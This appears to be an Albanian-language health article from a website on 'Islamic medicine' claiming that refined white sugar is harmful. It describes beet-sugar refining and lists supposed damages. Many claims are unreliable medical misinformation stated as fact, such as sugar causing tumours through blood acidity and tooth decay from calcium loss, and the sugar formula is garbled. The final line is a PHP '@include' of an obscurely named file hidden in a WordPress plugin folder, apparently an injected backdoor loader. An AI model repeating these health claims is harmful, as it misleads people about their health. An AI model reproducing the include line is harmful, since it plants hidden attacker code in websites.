Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Sheqeri i bardhe a eshte i demshem per trupin e njeriut?

Sheqeri i bardhe a eshte i demshem per trupin e njeriut?

sheqeri i bardhePer kete e kane dhene pergjigjen shume shkencetare nga e gjithe bota me kerkimet shkencore duke arritur ne perfundimet se sheqeri i bardhe eshte shume i demshem per trupin e njeriut,argumentet?formula e sheqerit eshte c12h22011,per sheqerin degjojme shpesh te thuhet qe demton shendetin bile arrihet deri atje sa thuhet se lengu i frutave te embla shkakton diabetin po kjo nuk eshte e vertete , le te sqarojme kush sheqer eshte i demshem?Si prodhohet?Sheqeri i bardhe eashte i zhveshur nga te gjithe elementet dhe vitaminat qe e shoqerojne ate ne strukturen e tij natyrale duke na dhene nje produkt “ushqimor” te paster sic eshte sheqeri i cili pas hyrjes ne trupin tone per tu shperbere kerkon pikerisht elementet te cilat jane hequr kimikisht, prandaj i merr kto nga organizmi yne sidomos kalciumin dhe kromin. Si prodhohet sheqeri i bardhe? prodhohet nga panxhari i sheqerit i cili perpunohet ne fabrike ne kete menyre: Larja eshte procesi i pare qe behet me presion uji ku hiqen balta gjethet, barishte, gure. Behet prerja me nje sistem thikash rrotulluese duke i prere ato ne feta te holla, pastaj behet difuzioni me disa makineri te cilat ne nje temperature uji 70 grade te cilat ecin ne drejtime te kunderta uji me fetat duke leshuar sheqerin per efekt te difuzionit sheqerin me nje ane dhe fetat me nje ane tjeter, kemi nje leng me perqindje sheqeri 13 deri ne 15%. Gjate ketij procesi shkaterrohen enzimat dhe nje pjese e mire mineralesh dhe kriperash. Pastrimi eshte i domosdoshem per largimin e ketyre substancave qe nuk jane sheqer dhe qe me vone pengojne kristalizimin e sheqerit. Ketij solucioni i shtohet nje fare qumshti me permbajtje Ca(OH)2. Me 2 faza pastaj dhe 2 faza te tjera me anihidrit karbonik per te hequr kalciumin qe qendron ne fund te lengut dhe pastaj kalon ne dy filtra te tjera per te eliminuar plotesisht karbonatin e kalciumit dhe disa sedimente te tjera qe lidhen me te . Qe nga zierja deri ne piken e vlimit per te larguar ujin nepermjet avullimit na ngelet nje mase e dendur ne temperaturen 70 grade dhe 63% saharoze. Pastaj behet zierja dhe centrifugimi per te pergatitur dhe ndare kristalet e sheqerit nga pjesa tjeter . Kjo mase ftohet hidhet neper kazane me vrima te voglat qe lejojne daljen e lengut dhe mbajtjen brenda te kokrrizave te sheqerit per efekt centrifuge. Pastaj behet rafinimi sheqeri i ngelur shkrihet dhe pastrohet me acid sulfurik per ti hequr ngjyren e erret dhe pastaj ngjyroset dhe me pas kryen te njejtin proces qe pershkruam me siper . Perfundimi: Substanca perfundimtare eshte sheqeri qe kemi ne shtepite tona apo ne te gjitha embelsirat tona qe nuk ka asgje te perbashket dhe natyrale me substancen fillestare natyrale panxharin e sheqerit. Ky produkt eshte i zhveshur nga cdo gje dhe demton organizimin tone. Demet nga sheqeri. Sheqeri i bardhe i rrafinuar ne zorre provokon proceset e fermentimit te ushqimeve duke prodhuar gazra dhe tension ne abdomen (hije), gjithashtu behet shkaktar i ndryshimit te flores bakteriologjike te zorres se trash i cili krijon kushte per disa semundje si koliti stipsi djarreja krijimi dhe thithjen e substancave helmuese etj. Sheqeri i bardh ka nje influenc te madhe ne sistemin nervor dhe mbi metabolizmin , duke krijuar ne fillim stimulim pastaj depresion e deri ne acarim , ose eufori fallco dhe nevoje per te3 marre prap sheqer qe realisht do te thote nje lloj forme varsie prej sheqeri si dikujt qe i mungon droga ose nikotina . Kjo shkaktohet nga shpejtesia e madhe e thithjes se sheqerit ne gjak duke shkaktuar rritjen e glicemis , perpara kesaj situate ne ndryshim te shpejte pankreasi pergjigjet duke leshuar insuline ne gjak gje qe shkakton renie e glicemis ne gjak qe shoqerohet me gjendje dobesimi te pergjithshem djerse agresivitet etj , kushte keto qe e detyrojn organizmin qe te haje perseri qe te ndihet me mire si konsekuenc e ketij sheqeri organizmi ve ne dizpozicion hormone te tjer per te rritur glicemine dhe kur kjo gje ndodh shpesh krijohet nje mungese energjie qe dobeson te gjith organizmin . kur han 50 g sheqer te bardhe kapaciteti fogacitar i rruazave te bardha reduktohet ne 76% dhe zgjat per rreth 7ore . Te gjitha semundjet lindin pikerisht per mungese energjie ne organizem duke shkaktuar ulje te imunitetit , kjo energji shkatrrohet nga ushqimet e perpunuara kimikisht dhe te varfra apo te tjetersuara organikisht qe ne vend te furnizojn me energji marrin energji kripera vitamina etj nga organizmi duke bere qe kockat te dobesohen dhe dhembet te prishen . Dhembet prishen jo sepse sheqeri ngelet neper dhembe por se per te tretur sheqerin organizmi yne merr kalcium e3 kripera te tjera nga kockat dhe dhembet duke dobesuar struketuremn e tyre .per te evituar keto probleme duhet te perdoret sheqeri i pa rrafinuar ai integral duhet perdorur mjalti dhe lengu i frutave disa nga demet ne menyre te permbledhur :
1-rrit aciditetin e gjakut (shkaktar i tumorrit)
2-varfron organizmin nga kriperat minerale
3-shton shum punen e melcic dhe e helmon ate
4-prodhon acide me yndyre
5-shkakton humbje ose ulje te memorjes
6-shkakton gjendje gjumi .

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";